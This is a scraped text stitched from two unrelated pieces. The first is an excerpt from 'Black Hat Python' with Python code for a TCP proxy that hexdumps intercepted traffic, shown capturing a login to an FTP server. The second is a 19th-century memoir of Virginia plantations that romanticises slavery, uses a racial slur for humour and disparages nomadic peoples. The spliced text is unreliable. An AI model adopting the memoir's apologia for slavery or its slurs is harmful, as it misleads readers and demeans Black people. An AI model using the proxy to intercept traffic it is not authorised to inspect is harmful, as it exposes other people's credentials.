def hexdump(src, length=16, show=True):

2 if isinstance(src, bytes):

The Network: Basics 19

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

src = src.decode()

results = list()
for i in range(0, len(src), length):
3 word = str(src[i:i+length])

4 printable = word.translate(HEX_FILTER)
hexa = ' '.join([f'{ord(c):02X}' for c in word])
hexwidth = length*3
5 results.append(f'{i:04x} {hexa:<{hexwidth}} {printable}')
if show:
for line in results:
print(line)
else:
return results

We start with a few imports. Then we define a hexdump function that

takes some input as bytes or a string and prints a hexdump to the console.
That is, it will output the packet details with both their hexadecimal values
and ASCII-printable characters. This is useful for understanding unknown
protocols, finding user credentials in plaintext protocols, and much more.
We create a HEXFILTER string 1 that contains ASCII printable characters, if
one exists, or a dot (.) if such a representation doesn’t exist. For an example
of what this string could contain, let’s look at the character representations
of two integers, 30 and 65, in an interactive Python shell:

>>> chr(65)
'A'
>>> chr(30)
'\x1e'
>>> len(repr(chr(65)))
3
>>> len(repr(chr(30)))
6

The character representation of 65 is printable and the character rep-

resentation of 30 is not. As you can see, the representation of the printable
character has a length of 3. We use that fact to create the final HEXFILTER
string: provide the character if possible and a dot (.) if not.
The list comprehension used to create the string employs a Boolean
short-circuit technique, which sounds pretty fancy. Let’s break it down: for
each integer in the range of 0 to 255, if the length of the corresponding
character equals 3, we get the character (chr(i)). Otherwise, we get a dot
(.). Then we join that list into a string so it looks something like this:

'................................ !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJK
LMNOPQRSTUVWXYZ[.]^_`abcdefghijklmnopqrstuvwxyz{|}~...........................
.......¡¢£¤¥¦§¨©ª«¬.®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæç
èéêëìíîïðñòóôõö÷øùúûüýþÿ'

The list comprehension gives a printable character representation of

the first 256 integers. Now we can create the hexdump function. First, we

20 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

make sure we have a string, decoding the bytes if a byte string was passed
in 2. Then we grab a piece of the string to dump and put it into the word
variable 3. We use the translate built-in function to substitute the string
representation of each character for the corresponding character in the raw
string (printable) 4. Likewise, we substitute the hex representation of the
integer value of every character in the raw string (hexa). Finally, we create a
new array to hold the strings, result, that contains the hex value of the index
of the first byte in the word, the hex value of the word, and its printable rep-
resentation 5. The output looks like this:

>> hexdump('python rocks\n and proxies roll\n')

0000 70 79 74 68 6F 6E 20 72 6F 63 6B 73 0A 20 61 6E python rocks. an
0010 64 20 70 72 6F 78 69 65 73 20 72 6F 6C 6C 0A d proxies roll.

This function provides us with a way to watch the communication going

through the proxy in real time. Now let’s create a function that the two
ends of the proxy will use to receive data:

def receive_from(connection):
buffer = b""
1 connection.settimeout(5)
try:
while True:
2 data = connection.recv(4096)
if not data:
break
buffer += data
except Exception as e:
pass
return buffer

For receiving both local and remote data, we pass in the socket object
to be used. We create an empty byte string, buffer, that will accumulate
responses from the socket 1. By default, we set a five-second timeout, which
might be aggressive if you’re proxying traffic to other countries or over lossy
networks, so increase the timeout as necessary. We set up a loop to read
response data into the buffer 2 until there’s no more data or we time out.
Finally, we return the buffer byte string to the caller, which could be either
the local or remote machine.
Sometimes you may want to modify the response or request packets
before the proxy sends them on their way. Let’s add a couple of functions
(request_handler and response_handler) to do just that:

def request_handler(buffer):
# perform packet modifications
return buffer

def response_handler(buffer):
# perform packet modifications
return buffer

The Network: Basics 21

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

Inside these functions, you can modify the packet contents, perform
fuzzing tasks, test for authentication issues, or do whatever else your heart
desires. This can be useful, for example, if you find plaintext user creden-
tials being sent and want to try to elevate privileges on an application by
passing in admin instead of your own username.
Let’s dive into the proxy_handler function now by adding the following
code:

def proxy_handler(client_socket, remote_host, remote_port, receive_first):

remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1 remote_socket.connect((remote_host, remote_port))

2 if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)

3 remote_buffer = response_handler(remote_buffer)
if len(remote_buffer):
print("[<==] Sending %d bytes to localhost." % len(remote_buffer))
client_socket.send(remote_buffer)

while True:
local_buffer = receive_from(client_socket)
if len(local_buffer):
line = "[==>]Received %d bytes from localhost." % len(local_
buffer)
print(line)
hexdump(local_buffer)

local_buffer = request_handler(local_buffer)
remote_socket.send(local_buffer)
print("[==>] Sent to remote.")

remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[<==] Received %d bytes from remote." % len(remote_buffer))
hexdump(remote_buffer)

remote_buffer = response_handler(remote_buffer)
client_socket.send(remote_buffer)
print("[<==] Sent to localhost.")

4 if not len(local_buffer) or not len(remote_buffer):

client_socket.close()
remote_socket.close()
print("[*] No more data. Closing connections.")
break

This function contains the bulk of the logic for our proxy. To start off,
we connect to the remote host 1. Then we check to make sure we don’t
need to first initiate a connection to the remote side and request data
before going into the main loop 2. Some server daemons will expect you
to do this (FTP servers typically send a banner first, for example). We then

22 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

use the receive_from function for both sides of the communication. It accepts
a connected socket object and performs a receive. We dump the contents of
the packet so that we can inspect it for anything interesting. Next, we hand
the output to the response_handler function 3 and then send the received
buffer to the local client. The rest of the proxy code is straightforward: we
set up our loop to continually read from the local client, process the data,
send it to the remote client, read from the remote client, process the data,
and send it to the local client until we no longer detect any data. When
there’s no data to send on either side of the connection 4, we close both
the local and remote sockets and break out of the loop.
Let’s put together the server_loop function to set up and manage the
connection:

def server_loop(local_host, local_port,

remote_host, remote_port, receive_first):
1 server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
2 server.bind((local_host, local_port))
except Exception as e:
print('problem on bind: %r' % e)

print("[!!] Failed to listen on %s:%d" % (local_host, local_port))

print("[!!] Check for other listening sockets or correct
permissions.")
sys.exit(0)

print("[*] Listening on %s:%d" % (local_host, local_port))

server.listen(5)
3 while True:
client_socket, addr = server.accept()
# print out the local connection information
line = "> Received incoming connection from %s:%d" % (addr[0],
addr[1])
print(line)
# start a thread to talk to the remote host
4 proxy_thread = threading.Thread(
target=proxy_handler,
args=(client_socket, remote_host,
remote_port, receive_first))
proxy_thread.start()

The server_loop function creates a socket 1 and then binds to the local
host and listens 2. In the main loop 3, when a fresh connection request
comes in, we hand it off to the proxy_handler in a new thread 4, which does
all of the sending and receiving of juicy bits to either side of the data stream.
The only part left to write is the main function:

def main():
if len(sys.argv[1:]) != 5:
print("Usage: ./proxy.py [localhost] [localport]", end='')
print("[remotehost] [remoteport] [receive_first]")
print("Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True")

The Network: Basics 23

 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold

sys.exit(0)
local_host = sys.argv[1]
local_port = int(sys.argv[2])

remote_host = sys.argv[3]
remote_port = int(sys.argv[4])

receive_first = sys.argv[5]

if "True" in receive_first:
receive_first = True
else:
receive_first = False

server_loop(local_host, local_port,
remote_host, remote_port, receive_first)

if __name__ == '__main__':
main()

In the main function, we take in some command line arguments and

then fire up the server loop that listens for connections.

Kicking the Tires

Now that we have the core proxy loop and the supporting functions in place,
let’s test it against an FTP server. Fire up the proxy with the following options:

tim@kali: sudo python proxy.py 192.168.1.203 21 ftp.sun.ac.za 21 True

We used sudo here because port 21 is a privileged port, so listening on it

requires administrative or root privileges. Now launch any FTP client and set
it to use localhost and port 21 as its remote host and port. Of course, you’ll
want to point your proxy to an FTP server that will actually respond to you.
When we ran this against a test FTP server, we got the following result:

[*] Listening on 192.168.1.203:21

> Received incoming connection from 192.168.1.203:47360
[<==] Received 30 bytes from remote.
0000 32 32 30 20 57 65 6C 63 6F 6D 65 20 74 6F 20 66 220 Welcome to f
0010 74 70 2E 73 75 6E 2E 61 63 2E 7A 61 0D 0A tp.sun.ac.za..
0000 55 53 45 52 20 61 6E 6F 6E 79 6D 6F 75 73 0D 0A USER anonymous..
0000 33 33 31 20 50 6C 65 61 73 65 20 73 70 65 63 69 331 Please speci
0010 66 79 20 74 68 65 20 70 61 73 73 77 6F 72 64 2E fy the password.
0020 0D 0A ..
0000 50 41 53 53 20 73 65 6B 72 65 74 0D 0A PASS sekret..
0000 32 33 30 20 4C 6F 67 69 6E 20 73 75 63 63 65 73 230 Login succes
0010 73 66 75 6C 2E 0D 0A sful...
[==>] Sent to local.
[<==] Received 6 bytes from local.
0000 53 59 53 54 0D 0A SYST..
0000 32 31 35 20 55 4E 49 58 20 54 79 70 65 3A 20 4C 215 UNIX Type: L
0010 38 0D 0A 8..

24 Chapter 2
 Black Hat Python (Early Access) © 2021 by Justin Seitz and Tim Arnold
[<==] Received 28 bytes from local.
0000 50 4F 52 54 20 31 39 32 2C 31 36 38 2C 31 2C 32 PORT 192,168,1,2
0010 30 33 2C 31 38 37 2C 32 32 33 0D 0A 03,187,223..
0000 32 30 30 20 50 4F 52 54 20 63 6F 6D 6D 61 6E 64 200 PORT command
0010 20 73 75 63 63 65 73 73 66 75 6C 2E 20 43 6F 6E successful. Con
0020 73 69 64 65 72 20 75 73 69 6E 67 20 50 41 53 56 sider using PASV
0030 2E 0D 0A ...
[<==] Received 6 bytes from local.
0000 4C 49 53 54 0D 0A LIST..
[<==] Received 63 bytes from remote.
0000 31 35 30 20 48 65 72 65 20 63 6F 6D 65 73 20 74 150 Here comes t
0010 68 65 20 64 69 72 65 63 74 6F 72 79 20 6C 69 73 he directory lis
0020 74 69 6E 67 2E 0D 0A 32 32 36 20 44 69 72 65 63 ting...226 Direc
0030 74 6F 72 79 20 73 65 6E 64 20 4F 4B 2E 0D 0A tory send OK...
0000 50 4F 52 54 20 31 39 32 2C 31 36 38 2C 31 2C 32 PORT 192,168,1,2
0010 30 33 2C 32 31 38 2C 31 31 0D 0A 03,218,11..
0000 32 30 30 20 50 4F 52 54 20 63 6F 6D 6D 61 6E 64 200 PORT command
0010 20 73 75 63 63 65 73 73 66 75 6C 2E 20 43 6F 6E successful. Con
0020 73 69 64 65 72 20 75 73 69 6E 67 20 50 41 53 56 sider using PASV
0030 2E 0D 0A ...
0000 51 55 49 54 0D 0A QUIT..
[==>] Sent to remote.
0000 32 32 31 20 47 6F 6F 64 62 79 65 2E 0D 0A 221 Goodbye...
[==>] Sent to local.
[*] No more data. Closing connections.

In another terminal on the Kali machine, we started an FTP session to

the Kali machine's IP address using the default port, 21:

tim@kali:$ ftp 192.168.1.203

Connected to 192.168.1.203.
220 Welcome to ftp.sun.ac.za
Name (192.168.1.203:tim): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
lrwxrwxrwx 1 1001 1001 48 Jul 17 2008 CPAN -> pub/mirrors/
ftp.funet.fi/pub/languages/perl/CPAN
lrwxrwxrwx 1 1001 1001 21 Oct 21 2009 CRAN -> pub/mirrors/
ubuntu.com
drwxr-xr-x 2 1001 1001 4096 Apr 03 2019 veeam
drwxr-xr-x 6 1001 1001 4096 Jun 27 2016 win32InetKeyTeraTerm
226 Directory send OK.
ftp> bye
221 Goodbye.

You can clearly see that we’re able to successfully receive the FTP ban-
ner and send in a username and password, and that it cleanly exits.

The Network: Basics 25

 Another Random Document on
Scribd Without Any Related Topics
 "Yes, it is slander to say you oppressed them:
Does a man squander the prize of his pelf?
Was it not often that he who possessed them
Rather was owned by his servants himself?"

This was true, but that it was known in the outside world we
thought impossible, when all the newspaper and book accounts
represented us as miserable sinners for whom there was no hope
here or hereafter, and called upon all nations, Christian and civilized,
to revile, persecute, and exterminate us. Such representations,
however, differed so widely from the facts around us that when we
heard them they failed to produce a very serious impression,
occasioning often only a smile, with the exclamation: "How little
those people know about us!"
We had not the vanity to think that the European nations cared or
thought about us, and if the Americans believed these accounts,
they defamed the memory of one held up by them as a model of
Christian virtue—George Washington, a Virginia slave-owner, whose
kindness to his "people," as he called his slaves, entitled him to as
much honor as did his deeds of prowess.
But to return to the two last lines of the stanza:

"Was it not often that he who possessed them

Rather was owned by his servants himself?"

I am reminded of some who were actually held in such bondage;

especially an old gentleman who, together with his whole plantation,
was literally possessed by his slaves.
This gentleman[10] was a widower, and no lady presided over his
house.
His figure was of medium height and very corpulent. His features
were regular and handsome, his eyes were soft brown, almost black,
and his hair was slightly gray. The expression of his countenance
was so full of goodness and sympathy that a stranger meeting him
in the road might have been convinced at a glance of his kindness
and generosity.
He was never very particular about his dress, yet never appeared
shabby.
Although a graduate in law at the university, an ample fortune made
it unnecessary for him to practice his profession. Still his taste for
literature made him a constant reader, and his conversation was
instructive and agreeable.
His house was old and rambling, and—I was going to say his
servants kept the keys, but I remember there were no keys about
the establishment. Even the front door had no lock upon it.
Everybody retired at night in perfect confidence, however, that
everything was secure enough, and it seemed not important to lock
the doors.
The negro servants who managed the house were very efficient,
excelling especially in the culinary department, and serving up
dinners which were marvels.
The superabundance on the place enabled them not only to furnish
their master's table with the choicest meats, vegetables, cakes,
pastries, etc., but also to supply themselves bountifully, and to
spread in their own cabins sumptuous feasts, and wedding and party
suppers rich enough for a queen.
To this their master did not object, for he told them "if they would
supply his table always with an abundance of the best bread, meats,
cream, and butter, he cared not what became of the rest."
Upon this principle the plantation was conducted. The well-filled
barns, the stores of bacon, lard, flour, etc., literally belonged to the
negroes, who allowed their master a certain share!
Doubtless they entertained the sentiment of a negro boy who, on
being reproved by his master for having stolen and eaten a turkey,
replied: "Well, massa, you see, you got less turkey, but you got dat
much more niggah!"
While we were once visiting at this plantation, the master of the
house described to us a dairy just completed on a new plan, which
for some weeks had been such a hobby with him that he had
actually purchased a lock for it, saying he would keep the key
himself—which he never did—and have the fresh mutton always put
there.
"Come," said he, as he finished describing it, "let us go down and
look at it. Bring me the key," he said to a small African, who soon
brought it, and we proceeded to the dairy.
Turning the key in the door, the old gentleman said: "Now see what
a fine piece of mutton I have here!"
But on entering and looking around, no mutton was to be seen, and
instead thereof were buckets of custard, cream, and blanc-mange.
The old gentleman, greatly disconcerted, called to one of the
servants: "Florinda! Where is my mutton that I had put here this
morning?"
 "WHERE IS MY MUTTON?"—Page 98.

Florinda replied: "Nancy took it out, sah, an' put it in de ole spring
house. She say dat was cool enough place for mutton. An' she gwine
have a big party to-night, an' want her jelly an' custards to keep
cool!"
At this the old gentleman was rapidly becoming provoked, when we
laughed so much at Nancy's "cool" proceeding that his usual good
nature was restored.
On another occasion we were one evening sitting with this
gentleman in his front porch when a poor woman from the
neighboring village came in the yard, and, stopping before the door,
said to him:
"Mr. Radford, I came to tell you that my cow you gave me has died."
"What did you say, my good woman?" asked Mr. Radford, who was
quite deaf.
The woman repeated in a louder voice: "The cow you gave me has
died. And she died because I didn't have anything to feed her with."
Turning to us, his countenance full of compassion, he said: "I ought
to have thought about that, and should have sent the food for her
cow." Then, speaking to the woman: "Well, my good woman, I will
give you another cow to-morrow, and send you plenty of provision
for her." And the following day he fulfilled his promise.
Another incident occurs to me, showing the generous heart of this
truly good man. One day on the Virginia and Tennessee train,
observing a gentleman and lady in much trouble, he ventured to
inquire of them the cause, and was informed that they had lost all
their money and their railroad tickets at the last station.
He asked the gentleman where he lived, and on what side he was
during the war.
"I am from Georgia," replied the gentleman, "and was, of course,
with the South."
"Well," said Mr. Radford, pulling from his capacious pocket a large
purse, which he handed the gentleman, "help yourself, sir, and take
as much as will be necessary to carry you home."
The astonished stranger thanked him sincerely, and handed him his
card, saying: "I will return the money as soon as I reach home."
Returned to his own home, and relating the incidents of his trip, Mr,
Radford mentioned this, when one of his nephews laughed and said:
"Well, uncle, we Virginia people are so easily imposed upon! You
don't think that man will ever return your money, do you?"
"My dear," replied his uncle, looking at him reproachfully and sinking
his voice, "I was fully repaid by the change which came over the
man's countenance."
It is due to the Georgian to add that on reaching home he returned
the money with a letter of thanks.

In sight of the hospitable home of Mr. Radford was another, equally

attractive, owned by his brother-in-law, Mr. Bowyer. These places
had the same name, Greenfield, the property having descended to
two sisters, the wives of these gentlemen. They might have been
called twin establishments, as one was almost a facsimile of the
other. At both were found the same hospitality, the same polished
floors, the same style of loaf-bread and velvet rolls, the only
difference between the two being that Mr. Bowyer kept his doors
locked at night, observed more system, and kept his buggies and
carriages in better repair.
These gentlemen were also perfectly congenial. Both had graduated
in law, read the same books, were members of the same church,
knew the same people, liked and disliked the same people, held the
same political opinions, enjoyed the same old Scotch songs,
repeated the same old English poetry, smoked the same kind of
tobacco, in the same kind of pipes, abhorred alike intoxicating
drinks, and deplored the increase of bar-rooms and drunkenness in
our land.
For forty years they passed together a part of every day or evening,
smoking and talking over the same events and people. It was a
picture to see them at night over a blazing wood fire, their faces
bright with good nature; and a treat to hear all their reminiscences
of people and events long past. With what circumstantiality could
they recall old law cases, and describe old duels, old political
animosities and excitements! What merry laughs they sometimes
had!
Everything on one of these plantations seemed to belong equally to
the other. If the ice gave out at one place, the servants went to the
other for it as a matter of course; or if the buggies or carriage were
out of order at Mr. Radford's, which was often the case, the driver
would go over for Mr. Bowyer's without even mentioning the
circumstance, and so with everything. The families lived thus
harmoniously with never the least interruption for forty years.
Now and then the old gentlemen enjoyed a practical joke on each
other, and on one occasion Mr. Radford succeeded so effectually in
quizzing Mr. Bowyer that whenever he thought of it afterward he fell
into a dangerous fit of laughter.
It happened that a man who had married a distant connection of the
Greenfield family concluded to take his wife, children, and servants
to pass the summer there, dividing the time between the two
houses. The manners, character, and political proclivities of this
visitor became so disagreeable to the old gentlemen that they
determined he should not repeat his visit, although they liked his
wife. One day Mr. Bowyer received a letter signed by this
objectionable individual—it had really been written by Mr. Radford—
informing Mr. Bowyer that, as one of the children was sick, and the
physician advised country air, he would be there the following
Thursday with his whole family, to stay some months.
"The impudent fellow!" exclaimed Mr. Bowyer as soon as he read the
letter. "He knows how Radford and myself detest him! Still I am
sorry for his wife. But I will not be dragooned and outgeneraled by
that contemptible fellow. No! I will leave home to-day!"
Going to the back door, he called in a loud voice for his coachman,
and ordered his carriage. "I am going" said he, "to Grove Hill for a
week, and from there to Lexington, with my whole family, and don't
know when I shall be at home again. It is very inconvenient," said
he to his wife, "but I must leave home."
Hurrying up the carriage and the family, they were soon off on their
unexpected trip.
They stayed at Grove Hill, seven miles off, a week, during which time
Mr. Bowyer every morning mounted his horse and rode timidly
around the outskirts of his own plantation, peeping over the hills at
his house, but afraid to venture nearer, feeling assured it was
occupied by the obnoxious visitor. He would not even make inquiries
of his negroes whom he met, as to the state and condition of things
in his house.
Concluding to pursue his journey to Lexington, and halfway there,
he met a young nephew of Mr. Radford's who happened to know all
about the quiz, and, immediately suspecting the reason of Mr.
Bowyer's exile from home, inquired where he was going, how long
he had been from home, etc. Soon guessing the truth, and thinking
the joke had been carried far enough, he told the old gentleman he
need not travel any further, for it was all a quiz of his uncle's, and
there was no one at his house. Thereupon Mr. Bowyer, greatly
relieved, turned back and went his way home rejoicing, but
"determined to pay Radford," he said, for such a practical joke,
which had exiled him from home and given him such trouble. This
caused many a good laugh whenever it was told throughout the
neighborhood.
The two estates of which I am writing were well named—Greenfield;
for the fields and meadows were of the freshest green, and, with
majestic hills around, the fine cattle and horses grazing upon them,
formed a noble landscape.
This land had descended in the same family since the Indian camp-
fires ceased to burn there, and the same forests were still untouched
where once stood the Indians' wigwams.
In this connection I am reminded of a tradition in the Greenfield
family which showed the heroism of a Virginia boy:
The first white proprietor of this place, the great-grandfather of the
present owners, had also a large estate in Montgomery County,
called Smithfield, where his family lived, and where was a fort for
the protection of the whites when attacked by the Indians.
Once, while the owner was at his Greenfield place, the Indians
surrounded Smithfield, and the white women and children took
refuge in the fort, while the men prepared for battle. They wanted
the proprietor of Smithfield to help them fight and to take command,
for he was a brave man; but they could not spare a man to carry
him the news. So they concluded to send one of his young sons, a
lad thirteen years old, who did not hesitate, but, mounting a fleet
horse, set off after dark and rode all night through dense forests
filled with hostile Indians, reaching Greenfield, a distance of forty
miles, next morning. He soon returned with his father, and the
Indians were repulsed. And I always thought that boy was
courageous enough for his name to live in history.[11]
The Indians afterward told how, the whole day before the fight,
several of their chiefs had been concealed near the Smithfield house
under a large haystack, upon which the white children had been
sliding and playing all day, little suspecting the gleaming tomahawks
and savage men beneath.
From the Greenfield estate in Botetourt and the one adjacent went
the ancestors of the Prestons and Breckinridges, who made these
names distinguished in South Carolina and Kentucky. And on this
place are the graves of the first Breckinridges who arrived in this
country.
All who visited at the homesteads just described retained ever after
a recollection of the perfectly cooked meats, bread, etc., seen upon
the tables at both houses, there being at each place five or six negro
cooks who had been taught by their mistresses the highest style of
the culinary art.
During the summer season several of these cooks were hired at the
different watering-places, where they acquired great fame and made
for themselves a considerable sum of money by selling recipes.
A lady of the Greenfield family, who married and went to Georgia,
told me she had often tried to make velvet rolls like those she had
been accustomed to see at her own home, but never succeeded. Her
mother and aunt, who had taught these cooks, having died many
years before, she had to apply to the negroes for information on
such subjects, and they, she said, would never show her the right
way to make them. Finally, while visiting at a house in Georgia, this
lady was surprised to see velvet rolls exactly like those at her home.
"Where did you get the recipe?" she soon asked the lady of the
house, who replied: "I bought it from old Aunt Rose, a colored cook,
at the Virginia Springs, and paid her five dollars."
"One of our own cooks, and my mother's recipe," exclaimed the
other, "and I had to come all the way to Georgia to get it, for Aunt
Rose never would show me exactly how to make them!"

CHAPTER XI.
Not far from Greenfield was a place called Rustic Lodge.[12]
This house, surrounded by a forest of grand old oaks, was not large
or handsome. But its inmates were ladies and gentlemen of the old
English style.
The grandmother, Mrs. Burwell, about ninety years of age, had in
her youth been one of the belles at the Williamsburg court in old
colonial days. A daughter of Sir Dudley Digges, and descended from
English nobility, she had been accustomed to the best society. Her
manners and conversation were dignified and attractive.
Among reminiscences of colonial times she remembered Lord
Botetourt, of whom she related interesting incidents.
The son of this old lady, about sixty years of age, and the proprietor
of the estate, was a true picture of the old English gentleman. His
manners, conversation, thread-cambric shirt-frills, cuffs, and long
queue tied with a black ribbon, made the picture complete. His two
daughters, young ladies of refinement, had been brought up by their
aunt and grandmother to observe strictly all the proprieties of life.
This establishment was proverbial for its order and method, the
most systematic rules being in force everywhere. The meals were
served punctually at the same instant every day. Old Aunt Nelly
always dressed and undressed her mistress at the same hour. The
cook's gentle "tapping at the chamber door" called the mistress to
an interview with that functionary at the same moment every
morning,—an interview which, lasting half an hour, and never being
repeated during the day, resulted in the choicest dinners, breakfasts,
and suppers.
Exactly at the same hour every morning the old gentleman's horse
was saddled, and he entered the neighboring village so promptly as
to enable some of the inhabitants to set their clocks by him.
This family had possessed great wealth in eastern Virginia during the
colonial government, under which many of its members held high
offices.
But impoverished by high living, entertaining company, and a heavy
British debt, they had been reduced in their possessions to about
fifty negroes, with only money enough to purchase this plantation,
upon which they had retired from the gay and charming society of
Williamsburg. They carried with them, however, some remains of
their former grandeur: old silver, old jewelry, old books, old and well-
trained servants, and an old English coach which was the curiosity of
all other vehicular curiosities. How the family ever climbed into it, or
got out of it, and how the driver ever reached the dizzy height upon
which he sat, was the mystery of my childhood.
But, although egg-shaped and suspended in mid-air, this coach had
doubtless, in its day, been one of considerable renown, drawn by
four horses, with footman, postilion, and driver in English livery.
How sad must have been its reflections on finding itself shorn of
these respectable surroundings, and, after the Revolution, drawn by
two republican horses, with footman and driver dressed in
republican jeans!
A great-uncle of this family, unlike the coach, never would become
republicanized; and his obstinate loyalty to the English crown, with
his devotion to everything English, gained for him the title "English
Louis," by which name he is spoken of in the family to this day. An
old lady told me not long ago that she remembered, when a child,
the arrival of "English Louis" at Rustic one night, and his
conversation as they sat around the fire,—how he deplored a
republican form of government, and the misfortunes which would
result from it, saying: "All may go smoothly for about seventy years,
when civil war will set in. First it will be about these negro slaves we
have around us, and after that it will be something else." And how
true "English Louis'" prediction has proven.[13]
Doubtless this gentleman was avoided and proscribed on account of
his English proclivities. For at that day the spirit of republicanism and
hatred to England ran high; so that an old gentleman—one of our
relatives whom I well remember—actually took from his parlor walls
his coat-of-arms, which had been brought by his grandfather from
England, and, carrying it out in his yard, built a fire, and, collecting
his children around it to see it burn, said: "Thus let everything
English perish!"
Should I say what I think of this proceeding I would not be
considered, perhaps, a true republican patriot.
I must add a few words to my previous mention of Smithfield, in
Montgomery County, the county which flows with healing waters.
Smithfield, like Greenfield, is owned by the descendants of the first
white family who settled there after the Indians, and its verdant
pastures, noble forests, and mountain streams and springs, form a
prospect wondrously beautiful.
This splendid estate descended to three brothers of the Preston
family, who equally divided it, the eldest keeping the homestead,
and the others building attractive homes on their separate
plantations.
The old homestead was quite antique in appearance. Inside, the
high mantelpieces reaching nearly to the ceiling, which was also
high, and the high wainscoting, together with the old furniture,
made a picture of the olden time.
When I first visited this place, the old grandmother, then eighty
years of age, was living. She, like the old lady at Rustic, had been a
belle in eastern Virginia in her youth. When she married the owner
of Smithfield sixty years before, she made the bridal jaunt from
Norfolk to this place on horseback, two hundred miles. Still
exceedingly intelligent and interesting, she entertained us with
various incidents of her early life, and wished to hear all the old
songs which she had then heard and sung herself.
"When I was married," said she, "and first came to Smithfield, my
husband's sisters met me in the porch, and were shocked at my pale
and delicate appearance. One of them, whispering to her brother,
asked: 'Why did you bring that ghost up here?' And now," continued
the old lady, "I have outlived all who were in the house that day, and
all my own and my husband's family."
This was certainly an evidence of the health-restoring properties of
the water and climate in this region.
The houses of these three brothers were filled with company winter
and summer, making within themselves a delightful society. The
visitors at one house were equally visitors at the others, and the
succession of dinner and evening parties from one to the other
made it difficult for a visitor to decide at whose particular house he
was staying.
One of these brothers, Colonel Robert Preston, had married a lovely
lady from South Carolina, whose perfection of character and
disposition endeared her to everyone who knew her. Everybody
loved her at sight, and the better she was known the more she was
beloved. Her warm heart was ever full of other people's troubles or
joys, never thinking of herself. In her house many an invalid was
cheered by her tender care, and many a drooping heart revived by
her bright Christian spirit. She never omitted an opportunity of
pointing the way to heaven; and although surrounded by all the
allurements which gay society and wealth could bring, she did not
swerve an instant from the quiet path along which she directed
others. In the midst of bright and happy surroundings her thoughts
and hopes were constantly centered upon the life above; and her
conversation—which was the reflex of her heart—reverted ever to
this theme, which she made attractive to old and young.
The eldest of the three brothers was William Ballard Preston, once
Secretary of the Navy in the cabinet of President Taylor.

CHAPTER XII.
In the region of country just described and in the counties beyond
abound the finest mineral springs, one or more being found on every
plantation. At one place there were seven different springs, and the
servants had a habit of asking the guests and family whether they
would have—before breakfast—a glass of White Sulphur, Yellow
Sulphur, Black Sulphur, Alleghany, Alum, or Limestone water!
The old Greenbrier White Sulphur Springs was a favorite place of
resort for eastern Virginians and South Carolinians at a very early
date, when it was accessible only by private conveyances, and all
who passed the summer there went in private carriages. In this way
certain old Virginia and South Carolina families met every season,
and these old people told us that society there was never so good
after the railroads and stages brought "all sorts of people, from all
sorts of places." This, of course, we knew nothing about from
experience, and it sounded rather egotistical in the old people to say
so, but that is what they said.
Indeed, these "old folks" talked so much about what "used to be in
their day" at the old White Sulphur, that I found it hard to convince
myself that I had not been bodily present, seeing with my own eyes
certain knee-buckled old gentlemen, with long queues, and certain
Virginia and South Carolina belles attired in short-waisted, simple,
white cambrics, who passed the summers there. These white
cambrics, we were told, had been carried in minute trunks behind
the carriages; and were considered, with a few jewels, and a long
black or white lace veil thrown over the head and shoulders, a
complete outfit for the reigning belles! Another curiosity was that
these white cambric dresses—our grandmothers told us—required
very little "doing up:" one such having been worn by Mrs. General
Washington—so her granddaughter told me—a whole week without
requiring washing! It must have been an age of remarkable women
and remarkable cambrics! How little they dreamed then of an era
when Saratoga trunks would be indispensable to ladies of much
smaller means than Virginia and South Carolina belles!
To reach these counties flowing with mineral waters, the families
from eastern Virginia and from South Carolina passed through a
beautiful region of Virginia known as Piedmont, and those who had
kinsfolk or acquaintances there usually stopped to pay them a visit.
Consequently the Piedmont Virginians were generally too busy
entertaining summer guests to visit the Springs themselves. Indeed,
why should they? No more salubrious climate could be found than
their own, and no scenery more grand and beautiful. But it was
necessary for the tide-water Virginians to leave their homes every
summer on account of chills and fevers.
In the lovely Piedmont region, over which the "Peaks of Otter" rear
their giant heads, and chains of blue mountains extend as far as eye
can reach, were scattered many pleasant and picturesque homes.
And in this section my grandfather bought a plantation, when the
ancestral estates in the eastern part of the State had been sold to
repay the British debt, which estates, homesteads, and tombstones
with their quaint inscriptions, are described in Bishop Meade's "Old
Churches and Families of Virginia."
While the tide-water Virginians were already practicing all the arts
and wiles known to the highest English civilization; sending their
sons to be educated in England, and receiving therefrom brocaded
silks and powdered wigs; and dancing the minuet at the
Williamsburg balls with the families of the noblemen sent over to
govern the colony,—Piedmont was still a dense forest, the abode of
Indians and wild animals.
It was not strange, then, that the Piedmont Virginians never arrived
at the opulent manner of living adopted by those on the James and
York rivers, who, tradition tells us, went to such excess in high living
as to have "hams boiled in champagne," and of whom other
amusing and interesting tales have been handed down to us.
Although the latter were in advance of the Piedmont Virginians in
wealth and social advantages, they were not superior to them in
honor, virtue, kindness, or hospitality.
It has been remarked that, "when natural scenery is picturesque,
there is in the human character something to correspond;
impressions made on the retina are really made on the soul, and the
mind becomes what it contemplates."
The same author continues: "A man is not only like what he sees,
but he is what he sees. The noble old Highlander has mountains in
his soul, whose towering peaks point heavenward; and lakes in his
bosom, whose glassy surfaces reflect the skies; and foaming
cataracts in his heart to beautify the mountain side and irrigate the
vale; and evergreen firs and mountain pines that show life and
verdure even under winter skies!"
"On the other hand," he writes, "the wandering nomad has a desert
in his heart; its dead level reflects heat and hate; a sullen, barren
plain,—no goodness, no beauty, no dancing wave of joy, no gushing
rivulet of love, no verdant hope. And it is an interesting fact that
those who live in countries where natural scenery inspires the soul,
and where the necessities of life bind to a permanent home, are
always patriotic and high-minded; and those who dwell in the desert
are always pusillanimous and groveling!"
If what this author writes be true, and the character of the Piedmont
